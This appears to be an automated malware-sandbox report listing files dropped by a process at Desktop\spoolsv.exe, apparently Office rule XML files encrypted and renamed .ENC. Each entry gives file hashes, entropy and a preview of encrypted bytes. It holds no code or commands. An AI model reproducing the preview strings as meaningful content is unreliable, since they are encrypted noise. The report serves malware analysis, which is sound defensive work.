                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.|....gba..4..x.We.{..hi.vU#K....C..qyTf.......K.....h$7._..M.'.iCD..}A.#..pn.z.4...CG......(TN3..0..u...r.&%.&..*.<.k.0bT~...........~.....9..Ck.4b$?.,..w..<X.....B.q..V..F..l..V..lJ.....,I. .....Fv...B...,d~..s..8v.(.5>-"fy9Q......?Sg....*`.bB.G...q..6.fwDX.D........HHm...v..AfoY./T.\.>....[..P1.Rt.L.8d..Z..8E}.A...O?..d.1.F.j...........?.#.....q.Zf...n7..@.9...A......k..+.,.........W.d.....[.... g..Kh....W....7X. E......(.QIh.].8...<..5...|.`..(.........dO....oc,Y....(........S....?.,..95.i.....$..)X..]7..kB.^(......&<W.n].....@hl..o."..Q.>3RR..Lo.(^q....h..P...I&.D....s4&.H.d.}.a...r......0r..?..ya......B..UV=6..=Nj...(s]..P....n......a..T.?..._..8.l.0..~[x..n.1<.......b2...t..r..V.s..-V.si..P....05.7!......[.qPtz80.`2....#L.&U.)<...G ............i...[.;i..]..=.7.G....Q......R......h..........+....X.[y*......f..`J..C...&9,....\Z`..bu&K...E...A..j_.[..F=ZkJ.a.6...]...i./....f.D...ms.2...fO.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701850v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.875566210142039
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/mBU8rTntimBLmbj+LpoUTTcj0p6OpWorkeQWcWaLdbWITqZswv8Y4n:/uZOj1UTTcj+j5HQW3aRKJZskZ4
                                                                                                                                                                                                                                                      MD5:499AAB821E121110C007FE2B138346F1
                                                                                                                                                                                                                                                      SHA1:F6622FE1F29E3B8ADDD5F9EF47402B01CD1E4230
                                                                                                                                                                                                                                                      SHA-256:FDA9D5D4E9D91EB095532095DB2EC230FB29E1EAC49212CB6DB70F900BFA40FC
                                                                                                                                                                                                                                                      SHA-512:9EB8CB457F86BAA296CF3372CA8AE10E421EDE35069670C1B24919A979F7218B4EBA3857695403EAE4BAF6FCACC631EB158BA53583EC5D612A6E4CFBBE5F4EA5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.k. }Z..$..:.......b..)...Rb.nW..../.....3>.Y..g.#..#...A.."....R....aMLG$.CGXQE......K.......G.R..".7me ..^[*.s]..s.....n..&...c|.}~IcX......0a..2..r}S.0.E..]...).O....w,$.+h.ZG....X.O..`{..j...-....yz.{V.VpaW.U.......A...Z.Q...7.....:T...W...<..utY.qult..c...$.uMc.@4..[..7c.\.....0.....>....,..[..Ib.h.xs....9._..>........,c..c/_.$.x."..M.....[..l.Vk....4.|..E..c.....FZ.m.....4g.."...{...I.r...R....t.......K.`vyI...rb.i....G.0(....nGT.':.^&.`.........@....AXN..^RT.O{.4?...a.V.....1.Sd.[........>...d.......MVI?eA....`V.[ar..J..f............a...-~5..0.o....%....;......^...b.$bZ0....'.4....u)..82........U.FQ(..l.5k....l6.h.T...^..:SJ...4..3.Mp.p..k._....t6...;t...E..K`x.!..!$...P.FdE}....."...Z..^.-)j.5.mA. .Ok>....x....+.c&8.......-.9pMX..ldn.!..G...+..i.et;B3.......h....H!a."....:.....j.....K.z...sD@.G.MV.k.U.T.`.T.=?..o..s..N.RW...c.}.....S..........o.H....H.md...c.w.}.h...F...34.4!.nu.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701851v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1424
                                                                                                                                                                                                                                                      Entropy (8bit):7.860441404946902
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/v+4cxQVEVxLs4toWhPOE0cLZ9UaUOXCF7UOL8sRJ+vhgQWKJJwC:/G4lA6usE0cV+ECFP9EvhgXKDh
                                                                                                                                                                                                                                                      MD5:B85CB2C0FCE369579C4094D76828C7E6
                                                                                                                                                                                                                                                      SHA1:143DF733CBA6579C8063F1A5CA1B96187772BBC7
                                                                                                                                                                                                                                                      SHA-256:144EF1F82D466FE700C1E96FDC9C40778CD0235ED9C129997C18BEF87D16F9CB
                                                                                                                                                                                                                                                      SHA-512:758D5085DEF8349B9D2E0AD41DA07CE36C595AAD9C8603359DD56DA1C0604B9FD7302FBDF0687EDF7A0236E0822BF7DA1E6789FFBD8E93C107BF00CB35D590AC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.......W^c........N..wyORo.s/.^v.}_\B+UKe7.S..-.....pd.BTWM..\.+7...b..pLs.$..k..+.&.|...Eoc...4...5..oY...cT.E....).N.EX..].....%....3................=.fp.,/H..K....^...Q.*.Y.$c40l.3.............'Lv...g..h.#).....r")h\R.}#.T;.D...:.G....F.].8..~3Uq....k[K.ZT.....pt'SU.cMI?.k.1...*..Nx..u..q..T.0#q.#.T.a@ .....dr....y>..S...A...&.....(L..g^....o..S.....Uk....|..Q.].........G.aa.x.p...o*...._....E....t&a:..6.....-.s...6.=(.vz.d...I..7.]h.,.I.p.W...$b.t..'.:..."..6...A.$o....NY... ..1...Z.O...U K.....0kd...Jz.l.~t....-...WK'!...Z..T....jl....SE...je..S..I......m..q=.6.l.Iq......Dnf.-....(....p.~>.~.U....g....Xk...2.s....Qf#c.$..Q..1.Sp..A.F.L~..TDr@.kv<%....H.)e}...N(..TC.k.!.-x7....e..c.......t..D.K....hn<v.W..,...,.V..[..O/...?.\.-p..`.x..c..cs.....U....f^g.z...3`.O.d.......B.....\.f.\..8.k..`....qH.1C?...@...j....h5...0..<..8.?..\...M.oo..\]..~.D.....&.0...F...V.Q.O.Y:K....y.+j.fm..T..j..(..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701900v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.850121113066376
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/V+mXlZVPQtSHtnrqMpbU95VlGPTTocurhjgXacEmVYg2zHG3+TtuPnU8+U8vvxG:/VhVPsSHtnr1J64Po9djmac8g2DNu9++
                                                                                                                                                                                                                                                      MD5:09908EC42DE713CB19BC923DC0F2CC38
                                                                                                                                                                                                                                                      SHA1:7F9F9CED45B9823151EDFA90B9741680A4B1DD04
                                                                                                                                                                                                                                                      SHA-256:D9B8EFD12DA026775B803874CE6D1208FE336CE9DAB14A8BBCE40CEB170E952F
                                                                                                                                                                                                                                                      SHA-512:305A2D470A6C97DA00AF9B31CC6411A7856F98365B99F40A12078D7CB5B6D887993816CDB41BCC86B590DCA6E7FDF6B654DC9C99FDB1CD115FA99AAF0AAB72C5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..#k<|..H.}.T.;.............+&.c..zk.R....-B...X.l...gT.k..G5.?...s%...,nH.&...=....1fQ.8.P.s.(|S?.z...dZ..M|L........:.v.[.7...d..CG[/.`......F...5.....7.#.....c1.....x.].......a.h...._;...d..7........F...jN"t..+..hV...+C*....)..x2.&....k.b.n...`...<IG.I...fP.g'..:..F...G....WI...l.........i*/........v..=V\.3.X..0...1(...)W..5....34!bwgb.k..h..Q.,R(..H..+E.x.Z.~.[....F^..z.3.D ...&.h.<.y.).+riMm.&......y.Ih0u..@RBM.4.\...>....._......;.4....!...q.[.RT....|.W.@d\.-8....8...6.VBK.Q2B.'k.b.8....l6?J".UE..PwC.:.H...8+a.~a...j...z.(.a..G.+."..;...M...|>v..?....|W.'b..8.t..t......))^(.`.<...._....6....$.a....WF'....=..<z].._..v..(...[|..2.qh.F.:K....q..aP...lq..,Q.,..j+....x.s.%.~.....n..I..6..^.........q..2.\jb.G.3(..o.Q9Gb...a..VQ`G@nD>Q...!.....S....7x...D...C..5.].X.."~.:.@..+.}....m..UWN..*.....+a.C...._1Ari......q.....*....}..WQ3...`7=K..|c..w...........iT.(R1.../`.N$.........C?...*.?..7.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701901v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.874500767291677
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/7g6HTdCMhxevQE9ypBJbmi2MduS3TcDwW9+R/GsI3e85Dl0CD:/7gGdCMhxex2V2MduS3TcF+R985Dl0u
                                                                                                                                                                                                                                                      MD5:6628DBEA2B32EF41442B152659A2D5AD
                                                                                                                                                                                                                                                      SHA1:796843A5CE9F394B30B43B5108B4086199AD542E
                                                                                                                                                                                                                                                      SHA-256:126F8D230811EAB6343408B73B8452C4EC882F5E839F4F6E7B8CA98D5EDAF368
                                                                                                                                                                                                                                                      SHA-512:33426E06FEC5FDBD30B8435D120FE08719CAD6E5F79AFAA5867096051549094EF58B5AC6696F6A1CCEBC22D17548448263BD8EB9C4EF63274A90E15D6E09EA24
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...:"..C.'4.....9..U....$.#.X...E.t......4.q.U.....+..G.d.Yej'........5.BI_..SJ....km..n....?...'.Q.5bp..>.N...@...2.p.^...C&..R.<w4.......az.<.W..R...........mJ.#.#..w..7.am.R.H.Z.Z..}.m.......y.u..H=-9..z.,.o..F24..|U."-.xIo...-....\...t.(..b..+.D@.A...L.!9.6.a.+.#k.~+.\~.0.....V.vL...#dr/k.i.<g.}.;].1O,o%...P.g&{1..~.Ku...q.m...3z^.v......h......F.......J..........N.X...`.%..%.....1.._.K.#...x*,t.....P...J.Xs.c..]ST$......q.5.&.x.>6.....G.K.%{..'e.$...G.a..G.Y..Z=....k.mf..n.....'|h.....b...H2...+|4E......]..8~...n../...4.D.f~..o..J......(Fv.6..n.;..v2e.K....r_..........E.1E.J....I......=b..+@....oy.vQt.|......j...:..0.L.~s...YN.9!..dbp....x..8....y#.Nup"..5..CCX.?z4.$....&G.*....2..exX{....1k}.Zh*A..*yK.F.4;...Q...^....._..>..f..O.Ym..v.O.....~W:..?*..6D{5....en....J.w..G...H..;....p....3......H..k...u}Z....3:{.^D.<z.....A....j...4K7..."S.x.W.zpV......Q a..v....k........\..$"...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701950v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1392
                                                                                                                                                                                                                                                      Entropy (8bit):7.8829859510697275
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/pTq/IinWgidX2j1GPKs53Oyi2BL8D7PfByNsflHcQR:/yIiWgicj1GPS2BLMTPflHcC
                                                                                                                                                                                                                                                      MD5:D7EF2554C3C20D016D19879D1C1C9912
                                                                                                                                                                                                                                                      SHA1:DF081089C1885668FAA5D5EB028A6C103064ABB3
                                                                                                                                                                                                                                                      SHA-256:E590A85C79EEC34AEFEF5F7F5300FB0009B00168FD4ED994DF2CE6F754C6C5F4
                                                                                                                                                                                                                                                      SHA-512:54D8FA39E424F7034261DC798DECBDBDD2B5D494B7911DD6C1225BAA25335F3673DDDA438C377963A917DB20A83E08063F3B28DEDC7E0D8C1090EFF0498CED0D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..u..!.5...xz....j21<-........R..CN...s..]...$....0..K....4e...}*2_.c...."H..r.M..m.&X.~S.......F0....c....L....*._.).................(....(..0)...X..N..h../.S.,.V...2.j..%.7u.{..!./..0.|...^.}..M...O.tw.B..U.L.....A...N....4..{Bx.#.jm..o..\...9D..].....A.08.g`.*.....Y...Z.D.....V..a..#.A.Yi..m..G9fG..w............-.u6U.j........G.?.p[...U....Av.x...b.....4@'.....d.5..,.. ..c.~k...MF.t.X...p.d.H....<g..K.....^..._..Q..........y......6.;.S..?...$xZ7.I.....L.....\.C..:..?....l..........(W. M.<(...."z.K..`....b:....#..A....z..vl?.m"...P......}.l?....^...7.o.g.V.o...@%y[..5..........w..V.Fip.....|.K....;........,K..+50Ixv.X.".^X.)8.p...x.f`...v....`z_.t.7JI...+1.W..R.5M..YS9.|.......).7...r.i`*..*v.:..q.t.....A...?..O.4...|.x6......G.T4t.........gj..I..E.:...Td..j..s=.....x.....(....N.|bSH..7.kc@]..........C..z.....<...6A....07.....G.>.P.E..eJ4Z...l........@...KB.[+c..T:g1..o..n....4o4.Q)..~.....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701951v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1424
                                                                                                                                                                                                                                                      Entropy (8bit):7.855751433024938
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/cGECB9iC2qpwwrrzTV9ixC96qDQCL7JwlF++Zj30CvDiNpxxB:/hbZekT15DQCLV2Q00UGNDxB
                                                                                                                                                                                                                                                      MD5:71A6619DFCA11ADFA5A4711F86284999
                                                                                                                                                                                                                                                      SHA1:6D16C8271AB62951DA95D3F6F73E208C99E4C831
                                                                                                                                                                                                                                                      SHA-256:A1B2988C78A1B8E1C21443BC6177C863622F59BA43CEFE89FE6071470E45BEB2
                                                                                                                                                                                                                                                      SHA-512:88E28F13775B08C8E474F9E9392CE7F36A61994AD7702A210837CDF298B1791DA0CC82A4232833A94BE019781F79918E53722959211AF7C61BD6B8F9DD2F8AFD
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...T...@.X..$...P.1.......I.t.l3...B.\.......3...F.1..-.e....|.PV.H~.$..d.ybF........6W...Z0y.a]...>.....r........d|....x2r.C1?....k.?.F.$......lB...f.......<....- ..#....1]...qnu......=.....7h..=..../.1..v,.y."a..^......*....o..=C..D..S..n...v.8. &....H.-.......Ec.&.I{..Xe.~........R.|..RU....B.=C..3'.n{...a...:y.~.>Dy..w.u.w.......*.u..hj.L5V..26.j.68]&,E......1......l.$.......8..xn ...1..c...L...T.?.ThC....~.Q..I..!3..n..[.X.W..4....%.1+.M.|.b.0....4.(.....A.u.C...}.....OOG......SF......_..[.(t.T..u.w......'7..3..z.^...[...U$j...Y.....U.......(.|...s.}h(&....c.3.+..8.D4.....N.....\.&.~a.7.......:.B..;5\.E.........^.E.'....^t.2.(.1.....l%=.....q.a..&....8LH..UV?(( !Kl...........z...3*....,..O.g.$.`q.6x43.2...N.4..9.....6P`....f.!..,\.D."N.n..0......9b.*.t.L..P.w.O...J...u....e.:..OL.5.......4.:.f....v;......u...i...Q..^....&WZ>P.h.d....c.0.........]P........Mq...e...'...S4..l..UO...*..-..O.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702000v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.871016107259494
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/VJQ2IhPdPMDyxp0IIIQBnAMh1XjUxQiaQZuLPEYpV5jqeqwU6lxu5TqG2Cq9H:/VJ0nxpBIIQBnRhAQia9P9pfjJqwU6lz
                                                                                                                                                                                                                                                      MD5:E2EB6C88C8BD5F3B6EA390E7003F3E9F
                                                                                                                                                                                                                                                      SHA1:5A7EB9472FDAB80FAD9E61446F862815B92E2D4B
                                                                                                                                                                                                                                                      SHA-256:B9BB34418DFB0562607F468E440C632ED3CBC86909F2CD70350F758F875D1EC6
                                                                                                                                                                                                                                                      SHA-512:56D2D549E19BA75D8754BDD69E659B2918F8FD45BFD0A83B3D6BE220C2C4330F7269DA84BAC9C1BDD175CED232BF0D816B349B8D8BCB9AE239BE6C23B329E43E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t....F...65. 4?.n_..!A.+|.}s.|..n...$.Q......u.j|'.....S..Y...........^...$.q......q`Ay.xC%.....t/....t$..@y:A.bz.d...l....5....|:.C..V0...$s.eP.~..V...8&.M.8..Cs#Ik.W......GB7.}|@....,..P..................y..R.@....}......qD.c...a....S2...EvG...)..9.B=Z&.a..9.y....l..-..R.a\l\..>zh2O....^|..B|.V.v.2...8..pRp.=.3S>%[..^./...B.nyd.^..5/.7...C...8..<x...C`*.....#!.6&..d.&...G.......Qt@.N..t.`.......Y..Z...5.?.}...5Pv....{.)....v..A....=...>.x?.fe-.<.f.W'.......t P.R...e......G..Od.p....;..............vH.|...... G*].=..+......1..[{.%..>M....E..0<...uc5wo..=..Pp6N.j...v..J..vn...:...,..w{.P..mT..~.b'...-w7/wo..i.7........4...........c..jy...s.^h......3u...-.'...4 h.8a8....6.q/E..7O.M.,$..._...1..~.yH.Z....x.F.Cm...s8.-.........9..PIxWx;._.=Y........}P..>#.*a....7...Z...T....+......>........y.e...1.....k-..............v.d..u.E...3..l....3..6.Cb..s...g...e...Yk.....(.*o`..?.......Q:........@I..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702001v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.876803829822663
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/DjpVPYYNe81zxcvLHsnn3zID2bm0Bk0tPqiHOmRhNygP4Ao5T0nPrBu41e4GA/H:/DwYPtcvLHIS0HRbNno5TGQ41IzzuIy
                                                                                                                                                                                                                                                      MD5:60200337B432B0A44A89F234491F9BBF
                                                                                                                                                                                                                                                      SHA1:80A298817BFB918062B1F94BB2DBD8701E8852D3
                                                                                                                                                                                                                                                      SHA-256:E2347C06E5C928BBA1FD04D85ECB172F529F4BCA1E234B0B291EF61CBA1A4FA0
                                                                                                                                                                                                                                                      SHA-512:0A5B458B72B6E89FDB407C376D131FB05AF8001F82D8C1C63908453CC5E6F93D04FFC1EA90CC811262F1D9B9E0C95A8D20AF53A374BAB8BECF1428E5DD0EC892
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..H6YNfS.x~.l/.......l...z..e^.<.......&(,z...?.r..$..@.......Y^...S..]...........].D...>[..-Z....#J..-.%.$y..g-.O.ws?2...q.R..........(..............^B.......}.4... .....('.....`'.......-..;.. ..e^...>.4!.i....U...'...@m...[%.Z8.N....R.. p@d.L.sR.n..%.%.K.......^.8D....7.X...<t&a...b..;....%.3..9.....c.!...]..2..~..E.}....D..'fc=D.c.Q.c'{.!k{.^.OQ..........Rj..p..o... ...b.^z.(...*CHT<.....#...nzv..|...q...M......Z......Z....E....;....)...>3f...;...pjU..w.1...FO.X..N5......x...#.o...}.......b...@#..?.abY*.Z.I.[....z..2.....7...s96)........^...F[....Pp3;.Z+..G..3.....!.M5D...k...Ki........DW....!.........2.M.*>ps..V..=^....,.gw.n..P.uO$..kM.>...e....W..&.,.....C.?O..+.Q!g:.../*.4.;.*.H..({...n.:... ..B.A......h.n.:N..Z.P3../u6.n...v.\.....Vt.eD.sq...55..>.+.2Bw.v...6............3..C"......X.k.W.!{RE.(.}.W..D*>/.C..}.....yy.j.^7...vj.3.9...9.. l.|.......2B....;.1....I'.7~&S.....C.x.Z~..z

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702050v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.869037537911003
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/hYQjRatibo4JZ5W6HAr1vNUmDMDh28KmV2Hgd9oUl5ahMvNnim:/NV8itlHAsm0k89Igd9vlBhl
                                                                                                                                                                                                                                                      MD5:2F24FAFB5F4D6163F6D07FE2C14D9A99
                                                                                                                                                                                                                                                      SHA1:B9F91CC7FA67064FE3BA791D495BEC73E0F1F8F3
                                                                                                                                                                                                                                                      SHA-256:E48187C085858616CB246685F06C135E19D44C346C4943571E9A7C045B0668E1
                                                                                                                                                                                                                                                      SHA-512:7EDD910F961A380808BD9C0953F5AD9B1B9227C75326E4CE1AB4528925104E7F8566B30E1FA7FAE737290EFA8AEE89855F638C386C5A7CC9D38908672020E666
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.y......ayB.9.K..o..&u.F.H...VT...+.....y...6FZ...z..^3...W....~..i...Q.l..=.G..Q[.!.M0....?2h..Q.S....I2.&.W./B....E.X.....T........|#..y....!...U..K..S:..../..Q....h.sEP..WEC.....W.Jln..e...W......^.|._.G.*4..\.K.x..[..x..b..z..U.A.5.Pf.7)...mP..-.6r7.7...T.............''.Z.t..R.|.|.K.c>..9.....M4.....?..~C../.T|.I9....R.O.....3.*.1..(..q.=...j.p.7...V.K..D.... .....$...3.|.n.$ve.o7.......{m.5.b......5s..f.....M.`.3..8...,....W.%`Yt.........f...U.....iT.'U.nRd..g....i@6....F@....<..g.....qr.....M...W...3.v3.*BRt..J.'fx,.C.K.B.wk......f,C3Y]..}>B.V.....;:.........@..*...h|..s.;:.EQ77..m..C$'........../.@(...[)..P.D....AQu.._...PF.K....D.p.y..H..?...[..]1.].+q`...V..I,..h.a.S..C..b.#....WC.D..N.q.L..u.i........k..`.&... C8g.k?../............6.$.o.....w.p@.R.....z.W...@G.u..TH.Y."...C....U....l.'x.#....R.gO...'..4?$...!.H..<..6.?P.w.........u4.`..h}...54s..N......I..F.9.......y%.5........KGm

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702051v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.866487625929864
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/BoK03/d2P7MHXQGWgezaqD2HJ3Y2arN6tOQC1yYJgxml5c2xX2FR5UjgFjdejVI:/Bo33m7MAGe3DuarN6OQC1/g65c2ckju
                                                                                                                                                                                                                                                      MD5:39BBB670B13A8C9F04433E4CE7F28F12
                                                                                                                                                                                                                                                      SHA1:E39D1AB5B9F12FC8565FAC0E8779F8D0E1735E7A
                                                                                                                                                                                                                                                      SHA-256:3187E6CD58F76F43BB2623E0CAD78FE280816BCCC04362BA53A14E367C65B4E3
                                                                                                                                                                                                                                                      SHA-512:D5F730FD46EF5442BE5025312DC47AC1A3E3F10CE0A47BE39774F990C6DF46457ACB3CDBA20D63AE7232795EAC8800172E59903893B298C6708BE6F71C93DFED
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...<3+..._E!.>..7.6..c..U.S...s.(..4...?..).h.E.z..)E.jd.b.$...".y\o.........E.)..RFIy"|mtT,....L..*.k.7.7.._&Y.....w......t.3..IO+D.R9.....k..2.W.D..j.t\.Q..)v,).#.d......w.....U.... ..K".]...V.1..::N....\.y.....6...........G.j{f?...2..O^Oc.b"`D....%...D%'~........6I(...T...r!..C..W.f.".......!...xgN.q..*..j..zz..M.c.E.!.(-o^d..T..'......1Ue..r...o..M^Bu.I.G......J:...........A.-BP...k...,>........:..\.s'......u9.Cda.8...8lj....q.....5.Z......!.i_b..|.FT...L.\.n..(CE..~...o.;Zu...gi-o..&.K.0...0n4....E...Y@R.......`.W.......u.QV..s.......'Mc(zR......b... ,.j.g....Y...E....@.c.)M..'....(..zC.Pa........_....W7w...1.\..o....(\.G.d...."'3,X.;......EI.^9.'..9G........o..&v.R.t...]....=.Hn...lx.Z.G."j"..zoP..f.... ..a:l...w.....LL...a..]^o5.B.SG....{...&i..?E.&.GGx..T..X..;..TB....\....6.........y@.d.=.(.m..k....y.J..+.cz..Q...Q.OQ..;......9pp.$..-......C..q.#.4s.~.w...e..K....*tT...?.P.<

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702100v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.862255155503057
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/IOJOacPPBIzf5Cs22a8XvVnnIBoXbZald/EcGvxacfeMJ4xKTonqeddFG:/X5cxIj5/22VFzXbEld/P6fJmqebFG
                                                                                                                                                                                                                                                      MD5:3306949A1072FEBF72982EBB998C75D7
                                                                                                                                                                                                                                                      SHA1:B11F068A233A0869C676FF224C35D021E550C054
                                                                                                                                                                                                                                                      SHA-256:3C224AE214557D93087505F3A7BF74393EA508FD53FA69EFC23918EA1D29B0F5
                                                                                                                                                                                                                                                      SHA-512:5D7DFBAA7DF68B4CDB72A328643BC0819A3ACCBBED1FCC5DD005738F466B4744472826597AF77E67DE5BD8EA49E5AF95C52E6237A40E45D43D1A2F387857A208
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t......l..K..S(...8..;...~;.Z.$...Vo...(._n..G.SP(....q...2..R....1e....X$.k...qw[....!.O|xi.zMH...@....x:..5....9R..w......@(<.....t:....z..z..1....b..yH..R..2{.@..c...l.D..;s....m.D..O..1..t....6J.....7:k.R..ZB3.....!!....`F.Q..u;<.t!.,QwfX..!}.e&....`.&.YV.....)*..N.....!..Q.(.....G....O,...+...,"........s./"....E.#%.hkY..(..,.G.K.n...G&.:....G.s.....N5....0....-.8/..^......Q.I.a&.....V06....y..s..n|..<.=F....M..2#....".-f>.u.......Q.p.../....-...-.;.;..hS...cSZ..pXB.#..r.....M.y!Jau.....<.6...q.o...D....N........]......}2F........y.Q>aW..'....W...p1g.{,C;L..2.....h..%c...U.p..No......+N.Z44eN..N..2....3.V..R....B..2.z....b,.X....I...b.#e2..r..?.KXmkS...E.7N...bz.....N...s....<.0.U.]E......!.Rz.~z..n..,..*..=4.`.......M.R&.5n..(.6...~9....[..x.^M\........).=..S..k..A_H.s+x..').&..;>.>|..zE~[Y...tF.Y....hMEI.......]V.*.8...;...g...L.M....E[1N ...1.lu.#tmw.t.~.\....0.=.'...N......_.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702101v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
